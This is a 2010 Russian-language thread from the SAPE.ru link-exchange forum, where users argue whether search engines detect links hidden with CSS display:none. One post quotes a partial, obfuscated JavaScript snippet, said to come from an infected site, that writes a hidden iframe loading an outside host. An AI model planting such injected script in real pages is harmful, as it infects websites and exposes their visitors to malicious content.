Вернуться   Форум SAPE.RU > Система SAPE.ru > Вопросы по работе системы

-->
Ответ
 
Опции темы
Старый 22.06.2010, 21:00   #11
Мастер
 
Аватар для Skybee
 
Регистрация: 09.11.2008
Адрес: Харьков
Сообщений: 726
Вес репутации: 229
Skybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущее
По умолчанию

Цитата:
Сообщение от opex Посмотреть сообщение
А что нельзя взять банально машинку которая будет пробегать по общей базе сайтов и ссылок и раздавать пряники вебмастерам помимо конечного потребителя?
Нет нельзя.

Повторюсь:
Цитата:
Сообщение от Skybee Посмотреть сообщение
Просто вы по видимому мало знакомы с такими технологиями как CSS и JS.
Skybee вне форума   Ответить с цитированием
Старый 22.06.2010, 21:20   #12
Новичок
 
Регистрация: 05.03.2009
Адрес: ДерЁвня Новые Грязюки
Сообщений: 47
Вес репутации: 185
opex на пути к лучшему
По умолчанию

Как я полагаю Вы один из таких вебмастеров?
Почему тогда я на локальной машине могу увидеть плагином скрытые ссылки а сапа поставить аналогичную локальную машину но на все ссылки не может?
opex вне форума   Ответить с цитированием
Старый 22.06.2010, 21:24   #13
Специалист
 
Аватар для koird
 
Регистрация: 22.07.2009
Сообщений: 438
Вес репутации: 207
koird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущее
Отправить сообщение для koird с помощью ICQ
По умолчанию

Цитата:
Сообщение от opex Посмотреть сообщение
А я про все методы не говорю в принципе!
Но банальные методы можно было бы отсекать на начальном уровне!
можно сделать проверку любого конкретного метода скрытия.
Но, как только это будет сделано, пользующиеся этим методом ВМ-ы перестанут им пользоваться и перейдут на другой метод.
а их (методов) - миллион.

кому оно надо - воевать с ветряными мельницами?
koird вне форума   Ответить с цитированием
Старый 22.06.2010, 21:30   #14
Новичок
 
Регистрация: 05.03.2009
Адрес: ДерЁвня Новые Грязюки
Сообщений: 47
Вес репутации: 185
opex на пути к лучшему
По умолчанию

Цитата:
Сообщение от koird Посмотреть сообщение
можно сделать проверку любого конкретного метода скрытия.
Но, как только это будет сделано, пользующиеся этим методом ВМ-ы перестанут им пользоваться и перейдут на другой метод.
а их (методов) - миллион.

кому оно надо - воевать с ветряными мельницами?
1) Ну не миллион это точно
2) Даже применив санкции на основные методы - ВМ побоятся экспериментировать да бы не вылететь полностью
3) Это надо МНЕ! Гугл к примеру давно уже определяет все эти display none и аналогичные фокусы и сильно понижает весомость донора.
opex вне форума   Ответить с цитированием
Старый 22.06.2010, 21:35   #15
Мастер
 
Аватар для Skybee
 
Регистрация: 09.11.2008
Адрес: Харьков
Сообщений: 726
Вес репутации: 229
Skybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущее
По умолчанию

Цитата:
Сообщение от opex Посмотреть сообщение
Как я полагаю Вы один из таких вебмастеров?
Нет, я не один из таких вебмастеров.
Цитата:
Сообщение от opex Посмотреть сообщение
Почему тогда я на локальной машине могу увидеть плагином скрытые ссылки а сапа поставить аналогичную локальную машину но на все ссылки не может?
Наверное по той же причине, по которой это не может сделать ни Google, ни Яндекс.
Skybee вне форума   Ответить с цитированием
Старый 22.06.2010, 21:44   #16
Специалист
 
Аватар для koird
 
Регистрация: 22.07.2009
Сообщений: 438
Вес репутации: 207
koird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущееkoird - прекрасное будущее
Отправить сообщение для koird с помощью ICQ
По умолчанию

Цитата:
Сообщение от opex Посмотреть сообщение
Это надо МНЕ! Гугл к примеру давно уже определяет все эти display none и аналогичные фокусы и сильно понижает весомость донора.
а можно узнать, откуда информация, что "давно", что "определяет", что "понижает" и что "сильно"?
со ссылочками, пожалуйста.

да даже банальный display:none вы фиг когда выловите.
если уж можно так намудрить, что разные браузеры его по-разному показывают...

p.s. у меня на одном из сайтов 2/3 информации в display:none (дизайн такой, "закладочный"). и что? все прекрасно индексируется.
p.p.s. ссылки не прячу, глупо это. Но и паранойи не разделяю.
koird вне форума   Ответить с цитированием
Старый 22.06.2010, 21:45   #17
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от opex Посмотреть сообщение
3) Это надо МНЕ! Гугл к примеру давно уже определяет все эти display none и аналогичные фокусы и сильно понижает весомость донора.
определяет, ага. По стуку.
Куда стучать в сапе - написано во первом комменте.
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 22.06.2010, 23:08   #18
Новичок
 
Регистрация: 05.03.2009
Адрес: ДерЁвня Новые Грязюки
Сообщений: 47
Вес репутации: 185
opex на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
определяет, ага. По стуку.
Куда стучать в сапе - написано во первом комменте.
Ну если вы говорите что определяет по стуку и ему глубоко фиолетово на всякие Display:none и JS - то вот такой код он в принципе не поймёт:

<script type='text/javascript' src='http://www.site.com/files/js.js'></script></script>

и в самом JS документе

document.write("<"+"i"+"f"+"rame"+" sr"+"c='http://site2.com/index.php?'"+" style='d"+"isplay:no"+"ne;'></"+"i"+"f"+"rame>");

(код полностью не вставился)

и не увидит в том числе. Я правильно понимаю?
Однако буквально в течение 2-х дней сайт который был заражен вирусом данным способом и в принципе даже я не видел линк при просмотре текстовой версии страницы попал в гугл как инфицированный.

Настучали? за два дня на сайт с количеством посетителей в день от 0 до 1?

Добавлено через 4 минуты
Ну а то что гугл не любит скрытый текст - он прямо предупреждает:
http://www.google.com/support/webmas...n&answer=66353

По принципу Господа - ваш сайт может быть подозрителен для нас - так как пользователь видит один текст а мы другой

Добавлено через 8 минут
p.s.

И так для сведения, после заражения сайт слетел с PR 5 до PR 3...

Последний раз редактировалось opex; 22.06.2010 в 23:11. Причина: Добавлено сообщение
opex вне форума   Ответить с цитированием
Старый 22.06.2010, 23:37   #19
Мастер
 
Аватар для Skybee
 
Регистрация: 09.11.2008
Адрес: Харьков
Сообщений: 726
Вес репутации: 229
Skybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущееSkybee - прекрасное будущее
По умолчанию

zhegloff, похоже пора тему закрывать.


opex, для этого достаточно иметь уже ранее засвеченный шаблон заразы.
И не путайте то, что Вы написали с CSS. О том, что скрытый текст "не хорошо" пишет и Гоша и Яша, вот только распознать этого ни тот ни другой не может.
Да и вообще если бы вы знали CSS и хоть когда-то занимались версткой HTML страниц, у Вас бы все вопросы отпали сами совой.
Skybee вне форума   Ответить с цитированием
Старый 23.06.2010, 00:07   #20
Новичок
 
Регистрация: 05.03.2009
Адрес: ДерЁвня Новые Грязюки
Сообщений: 47
Вес репутации: 185
opex на пути к лучшему
По умолчанию

Согласен, тему пора закрывать
Так как Вас не переубедишь...

Но всё же может быть Вы объясните мне почему так называемый РАНЕЕ ЗАСВЕЧЕННЫЙ ШАБЛОН ЗАРАЗЫ на ЯВА СКРИПТЕ вообще оказался у гугла?

И согласен это не CSS.
Но вы все дружно кричите что ПС не видят ни того ни другого?
а вирус находящийся в JS файле увидели, прочли и нашли?

Добавлено через 7 минут
p.s.

И не надо считать ПС глупее чем они есть

Последний раз редактировалось opex; 23.06.2010 в 00:07. Причина: Добавлено сообщение
opex вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
<div style="display:none;"> Всем хозяевам привет!! jonik333 Вопросы по работе системы 38 06.08.2012 11:29
СДЕЛАЙТЕ ПРОВЕРКУ НА <div style="display:none"> opex Пожелания пользователей системы 28 02.06.2010 01:50
div style="display:none;" C какого хрена? andy78 Вопросы по работе системы 65 29.12.2008 16:47
<div style="position: absolute; display: none;"> den78ru Ошибки при работе с системой 16 09.03.2008 08:48
Ссылки в <div style="display:none;"> !!! zeromodule Вопросы по работе системы 12 17.11.2007 15:41


Часовой пояс GMT +3, время: 00:33.